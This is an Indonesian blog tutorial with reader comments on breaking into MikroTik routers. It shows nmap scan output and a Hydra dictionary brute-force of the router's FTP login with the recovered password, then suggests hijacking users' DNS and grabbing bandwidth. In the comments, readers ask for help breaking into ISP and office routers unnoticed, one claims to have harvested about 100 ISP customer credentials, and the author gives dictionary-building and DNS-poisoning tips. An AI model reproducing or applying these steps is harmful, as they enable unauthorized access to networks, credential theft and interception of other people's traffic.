Hacking password Mikrotik secara langsung dengan memanfaatkan titik terlemah


Tidak ada sistem yang aman 100%, karena begitu banyak kemungkinan jika kita melihat dari berbagai sisi, sebelumnya penulis menulis artikel untuk hacking mikrotik dari sisi celah di telnet, tapi sebenarnya sama bahayanya dengan telnet yaitu FTP.

Percobaan penulis melakukan serangan BF (brute force) pada http, telnet dan ssh mengalami kegagalan, setelah termenung sekian lama ahkirnya penulis ingat serangan BF pada FTP di waktu sebelumnya, ahkirnya penulis mencoba melakukan BF pada FTP dan hasilnya ternyata bisa. Hmm username dan password untuk http, telnet, ssh, telnet adalah sama, satu celah kena maka semua kena, jadi? :)

Dari sisi kompatibilitas mikrotik dapat diancungi jempol tapi akibat dari banyaknya kompatibilitas yang ada dapat membawa ancaman lebih besar, seperti pada telnet yang penulis bahas dan praktek diartikel yang sebelumnya.

Oke, kita langsung praktek saja, kita periksa port yang terbuka di mikrotik

C:\Documents and Settings\serverdata>nmap -A 192.168.1.174

Starting Nmap 5.21 ( http://nmap.org ) at 2011-11-07 15:36 Pacific Standard Time

Nmap scan report for 192.168.1.174
Host is up (0.00013s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        MikroTik router ftpd 3.20
22/tcp   open  ssh        OpenSSH 2.3.0 mikrotik 2.9 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 1024 c6:5e:04:d3:12:db:1d:98:c9:17:e2:98:77:d4:39:ba (RSA1)
|_1024 76:68:bc:ee:e3:40:f5:6b:72:ea:44:55:df:86:06:ec (DSA)
23/tcp   open  telnet     Linux telnetd
80/tcp   open  http       MikroTik router http config
|_html-title: mikrotik routeros > administration
2000/tcp open  winbox     MikroTik WinBox management console
8080/tcp open  http-proxy Mikrotik http proxy
8291/tcp open  unknown
MAC Address: 08:00:27:22:84:F1 (Cadmus Computer Systems)
Device type: media device
Running: Chumby embedded
OS details: Chumby Internet radio
Network Distance: 1 hop
Service Info: OS: Linux; Device: router

HOP RTT     ADDRESS
1   0.13 ms 192.168.1.174

OS and Service detection performed. Please report any incorrect results at http:
//nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.00 seconds

Ternyata banyak port dan service yang terbuka di mikrotik. :D

Oke tidak perlu berpanjang-panjang lebar lagi, kita langsung hack saja mikrotik target.

C:\Documents and Settings\serverdata>


Anda bisa menggunakan tool Hydra GUI buatan Yogyafree disini

C:\hydra>hydra -l admin -P kamus.txt 192.168.1.174 ftp
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-11-07 14:39:20
[DATA] 16 tasks, 1 servers, 23 login tries (l:1/p:23), ~1 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.174   login: admin   password: jagoan
[STATUS] attack finished for 192.168.1.174 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2011-11-07 14:39:26

Binggo, password mikrotik sudah didapat, kita coba masuk lewat web.

Saat login dan exploitasi yang dapat dilakukan.

Menghajar para pengguna jaringan di mikrotik dengan mengarahkan DNS Servernya ke DNS Server milik kita, ya samalah tekniknya dengan teknik di artikel sebelumnya yang penulis tulis untuk poisoning DNS para pengguna yang menggunakan DHCP router. :D

Ingin dapat bandwidth full ? :D

Terbatas di web, pakai winbox saja dan login pakai pakai password yang kita hack dari FTP sebelumnya biar lebih banyak option lagi, jika ingin mengganti password router password mikrotik di winbox maka contohnya klik saja password dan muncul form input untuk password lama dan password baru.

Oke, sekian dulu, cayooo.

Oleh Kurniawan – [email protected]

 

,

  1. #1 by respati on 2011/11/07 - 4:15 pm

    fuihh tidak selama mikocok itu aman….
    trs progy yg kita butuhin apa aj mas buat jalanain itu semua
    Best Regards,

    • #2 by admin on 2011/11/07 - 4:19 pm

      Bukannya bahasannya ttg mikrotik, jalanin apa mas? klo tool ada di tutorial.

  2. #3 by aldy on 2011/11/08 - 1:42 pm

    kok gampang banget dapet username dan passwordnya mas,, atau sudah melakukan sniffing dulu sebelumnya .. terima kasih

    • #4 by admin on 2011/11/09 - 7:44 am

      Lebih mudah jika password ada di list file dictionary untuk BF, jika tidak ada maka sulit. Tidak pakai sniffing.

  3. #5 by real_black on 2011/11/10 - 1:39 pm

    om kamus siapa yang dibuat patokan? kalo pass mikrotikku tak kasih pass yang ada di luar kamus om, bisa gak nembus hehehehe

    • #6 by admin on 2011/11/10 - 4:16 pm

      Tidak ada yang buat patokan. Tidak bisa karena metode yang digunakan adalah dictionary attack.

  4. #7 by masjiban on 2011/11/15 - 12:47 pm

    mas Kurniawan, cara ini bisa buat ngereset password AP outdoor gak ya? AP saya dijailin orang…password+usernamenya diganti…

    • #8 by admin on 2011/11/15 - 3:34 pm

      Secara umum tidak, tapi jika secara tidak umum keberuntungan berpihak kepada anda karena password yang diganti ada pada daftar file dictionary maka dapat saja memungkinkan hal itu terjadi.

  5. #9 by death voie on 2011/11/23 - 1:48 pm

    ka kalau kita gak tahu usernamenya gmna ka?
    apa yang harus kita lakukan?
    ini kan untuk username admin .lalu jika usrnamenya ganti gmna?

    hydra -l admin -P kamus.txt 192.168.1.174 ftp

    • #10 by admin on 2011/11/24 - 8:39 pm

      Jika username ganti maka -l menjadi -L lalu masukkan file dictionary untuk username.

  6. #11 by flyman on 2011/11/24 - 3:29 am

    thx atas infonya, sangat beguna bagi Nusa dan bangsa. :)

  7. #12 by ichi on 2011/11/26 - 1:56 am

    mas kamus.txt nya ditaruh dimana? saya gunakan ubuntu

  8. #13 by hahahay on 2011/11/27 - 1:07 am

    Mantab….jangan lupa gunakan Xcode…
    yogyakarta free….

  9. #14 by alaannahdie on 2011/11/28 - 5:14 pm

    om..kalau pass luar kamus kan ga bisa di attack?terus biar dapat pass. cara attacknya gmana om???

  10. #15 by death voice on 2011/12/07 - 8:07 am

    admin :
    Jika username ganti maka -l menjadi -L lalu masukkan file dictionary untuk username.

    jadi user sama pwnya langsung di dictionary ka?
    oia ka buat lagi tutor thc hydra ka…
    thx

  11. #17 by death voice on 2011/12/18 - 5:48 am

    @admin
    ka kalau mau belajr thc itu mulai dari mana ya ?
    adakah ebook yang kaka punya ?
    terimkasih
    .

  12. #18 by hegner on 2011/12/23 - 11:40 am

    Ka, knpa bsa gni y..??

    C:\Hacking\hydra>hydra -l admin -P kamus.txt 192.168.1.1 ssh2
    Error: Compiled without LIBSSH support, module not available!

    solusinya gmna..???

    • #19 by admin on 2011/12/23 - 12:32 pm

      Pakai backtrack 3 saja, tutorialnya sudah saya tulis, ada di blog ini, cr aja.

  13. #20 by hegner on 2011/12/23 - 7:53 pm

    @admin

    cara melakukan poisoning dns gmna yha..??
    tanpa menggunakan cain abel..

    • #21 by admin on 2011/12/24 - 3:53 am

      ettercap, tutorial dpt dicr di google

  14. #22 by markesot on 2012/01/11 - 12:15 am

    mas kurniawan, apa betul penggunaan vnc port 5900 mengakibatkan bocornya koneksi internet?

    kantor saya pakai ip publik, saya biasa pakai vnc pada port 5900 untuk membantu pekerjaan saya dari luar kantor/rumah, khususnya ketika libur, sedang cuti aatau ketika saya sakit.

    suatu waktu, port ini ditutup oleh ISP (yang masih satu grup dengan perusahaan saya) dengan alasan ada dugaan keboccoran internet keluar.

    hal ini sangat merugikan saya.

    ——————————————–

    si ISP ini pakai mikrotik untuk managementnya,
    bisa di bobol? jika bisa, saya bisa memberikan data ip mereka (yg pernah saya intip lewat neighbour), untuk pertanyaan kedua ini saya akan lewat japri saja jika mas kurniawan berkenan.

  15. #23 by strike on 2012/01/13 - 10:49 pm

    om bahan-bahan yang saya butuhkan apa aja ya terus langkah – langkah nya apa ,,, soalnya gak di jelasin langkah pertama sampai terakhir kita harus ngapa-ngapaen

  16. #24 by Syazzaqa on 2012/01/24 - 1:25 pm

    C:\Documents and Settings\serverdata>

    H:\hydra>hydra -l admin -P kamus.txt 192.168.1.174 ftp

    Perintah diatas dikomputer mana ya mas ? Maklum newbie bgt :)

  17. #25 by kev on 2012/04/19 - 5:55 pm

    mas aku uda coba tapi nga biSa..???

    aku uda cobA pake caradi atas tapi nga bSa

  18. #26 by ali on 2012/06/08 - 1:53 am

    terimakasih mas, dan bisa rekomendasi ndak mas buat kamusnya ato dictionary nya ?

    • #27 by admin on 2012/06/10 - 10:02 pm

      untuk kemungkinan lebih besar secara umum maka isi file kamus atau dictionarynya dengan kata, kata-kata, angka-angka, dst yang bs juga ditambah kombinasi, yang intinya semua dari berbagai hal yang berhubungan dengan si admin, yang didalamnya tetap tidak lupa dimasukkan juga yang umum selain dari karateristik si admin.

  19. #28 by gabrielle on 2012/06/10 - 6:56 am

    minta dictionarynya donk om

  20. #29 by ehem on 2012/07/07 - 3:17 am

    om ini make nmap sama hydra ? itu diatas nya proses nya doank ? tanpa dikasih software nya ==a

  21. #30 by Muhajir on 2012/07/08 - 6:11 pm

    mas kalau mau reset password mikrotik tu gimana ya!! soalnya saya adha buka warnet jaringannya pake mikrotik tpi pasword saya yg lama ga’ bisa lagi kayaknya ada yang ganti!!! tolong ya mas!! trims

  22. #32 by Lemuel on 2012/07/09 - 1:00 am

    Yth Mas Kurniawan,

    Salam kenal mas. Mohon bantuannya..
    Router Kantor saya ada yang mengganti passwordnya mas, kemaren saya lupa mengganti passwordnya. sebelumnya saya ada pertengkaran dengan seorang pegawai di kantor.
    mas, bisa tanya??

    nmap nya dapat dari mana, dan hydranya dapat dari mana ya mas?? mohon pencerahannya
    kok saya coba di windows gak bisa mas..

    thanks.

    Hormat saya,

    * **Lemuel Artios Lumban Tobing*

  23. #33 by lemuel on 2012/07/09 - 2:10 am

    mas, download hydranya di mana ya mas??? bisa dikasikan linknya mas??tx

  24. #35 by toni on 2012/08/21 - 8:40 am

    dictionary attack.y didapat dimn…????

  25. #36 by ali on 2012/09/02 - 2:07 pm

    mas 1.174 itu ip nya apa ??? mikrotic nya atau komp lain
    Terus hedra nya Itu gak aku ngerti mohon bantuan

  26. #37 by dhikadhuan on 2012/09/03 - 2:56 am

    kl punya file backup mikrotiknya cukup dibrowse pd http://mikrotikpasswordrecovery.com
    sangat cepat

  27. #38 by itzu on 2012/09/06 - 10:29 am

    gan, kalo hack mikrotik tanpa login…
    berbagai cara udah q coba seperti mac cloning…
    tetep gag berhasil gimana cara ngatasinya…???

  28. #39 by Dewa_crot on 2012/09/25 - 3:37 am

    om kasih donk passlist buat bahasa indonesia kalo bisa alay…

  29. #40 by ilusi on 2012/10/23 - 11:16 am

    kak kalok ga ada port yang kebuka gimana kk?

  30. #41 by atha on 2012/10/24 - 3:04 am

    mas, di dalam folder hydra itu ada apa saja? foldernya dapat dari mana mas? trus ini pake OS apa?

  31. #42 by abhel on 2012/10/30 - 7:23 am

    mas ini di jalankan di windows atau linux ???
    klu saya pake linux apa sama caranya dengan di atas ????

  32. #43 by budi hermawan on 2012/11/06 - 3:31 am

    klo begini gimana mas ??

    tarting Nmap 6.01 ( http://nmap.org ) at 2012-11-06 11:27 Malay Peninsula Standard Time

    Nmap scan report for mil.net (192.168.1.1)

    Host is up (0.0072s latency).

    All 1000 scanned ports on mil.net (192.168.1.1) are filtered

    MAC Address: 00:0C:42:57:FE:6E (Routerboard.com)

    Too many fingerprints match this host to give specific OS details

    Network Distance: 1 hop

    TRACEROUTE

    HOP RTT ADDRESS

    1 7.18 ms mil.net (192.168.1.1)

    OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

    Nmap done: 1 IP address (1 host up) scanned in 28.44 seconds

  33. #44 by rivanx on 2012/11/11 - 1:29 pm

    wah mantap tapi ada ga menggunakan windows ini menggunakan linux.. mumet liatnya

  34. #45 by raiso on 2012/11/12 - 11:13 am

    C:\Documents and Settings\serverdata>nmap -A 192.168.1.174
    itu dah jelas dijalankn via os wedus

  35. #46 by www on 2012/12/27 - 1:47 pm

    aku nda mudeng om… gmana caranya biar mudeng itu

  36. #47 by dani on 2013/01/15 - 4:16 am

    mas saya masih pemula .,.,.,saya coba di dos ketik perintah C:\Documents and Settings\serverdata>nmap -A 192.168.1.174 hasilnya error .,.,.nmap is not recognized bla.,.,bla.,.,bla.,.,,.?mohon pencerahannya

  37. #48 by abdul on 2013/01/22 - 6:49 am

    gan ane pake win 7 bingung nih caranya??

  38. #49 by pinet on 2013/01/26 - 7:32 am

    Makasih mas, tutorial ini saya pake pd modem adsl. work 100%, dan sampe saat ini saya sudah dapat sekitar 100 username & password speedy. Note: username & password speedy hanya saya gunakan untuk melihat-lihat paket2 speedy

  39. #50 by tocxid on 2013/01/29 - 5:15 am

    om aku kelupaan pasword ROUTER MIKROTIK 750G, direset gak maw..tolongin donk

  40. #51 by bx on 2013/02/01 - 12:01 am

    gan,,,gan,,,,gak pake tool gan???

  41. #53 by mohammad on 2013/02/17 - 6:29 pm

    very nice !

    good…

    thnks !!!

  42. #54 by baron on 2013/03/01 - 4:33 pm

    hasem

  43. #55 by xxx on 2013/03/09 - 12:44 am

    master bgmana low port 21 ftp di di tutup..?? bgmana cara buka portx… mohon petunjuk…!!!

    • #56 by Poni on 2013/03/09 - 9:31 am

      kalo port 21 ditutup itu artinya admin menutup port ftp. coba crack lewat ssh

  44. #57 by Imtikhan.Com on 2013/03/15 - 6:20 pm

    aq coba dulu gan

  45. #58 by doni on 2013/04/30 - 6:38 am

    hydra -l root -p toor 192.168.20.2 ftp
    Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak – for legal purposes only

    Hydra (http://www.thc.org/thc-hydra) starting at 2013-04-30 20:27:20
    [DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
    [DATA] attacking service ftp on port 21
    [STATUS] attack finished for 192.168.20.2 (waiting for children to finish)
    1 of 1 target successfuly completed, 0 valid passwords found
    Hydra (http://www.thc.org/thc-hydra) finished at 2013-04-30 20:27:21

  46. #59 by Spootnik on 2013/05/22 - 8:26 am

    kk, di kantor saya itu jaringan internetnya mpe 10 – 20 mbps…
    nah bagian urusan jaringan itu mereka membagi hanya 100 -250 kbps ke seluruh pengguna, tp klw kita main ke tempat mereka buiiiihhh Zzzuper cepat. ada gak cara ngejebol mikrotik server kk, karena klw kita mo login itu pake user name dan pass di web login. tolong di bantu kk langkah”nya saya ingin belajar lbh dalam ngejebol mikrotik server serta cara agar gk ke detek oleh admin klw mac dan IP kita lg sniffing server.

  47. #60 by deni setiawan putra on 2013/06/03 - 11:34 pm

    info yang berguna. don’t go anywhere

  48. #61 by Ibenk on 2013/06/12 - 9:31 am

    Akibat kecerobohan yg pengen tau,,, ane coba restore settingan lama di mikrotik… Wal hasil 100 % Sukses.. tapi ane jadi g bisa masuk login mikrotik lewat Winbox … Ad saran kang… gimana nangani’y…???

  49. #62 by Fadli on 2013/07/05 - 6:18 pm

    brute truuss dari a ampe z xD

    thx infonya gan

  50. #63 by Musyawirul Haq on 2013/08/03 - 6:15 am

    mas…ini tool biar bisa dapat username dan password di wifi yang pakai mikrotik kan…?

  51. #64 by Inksz on 2013/10/14 - 6:37 am

    Kang kl defend biar ga di hack gini gmn yah??
    kmarin pernah sy di hack giniin juga, ampai manggil teknisi T.T

(will not be published)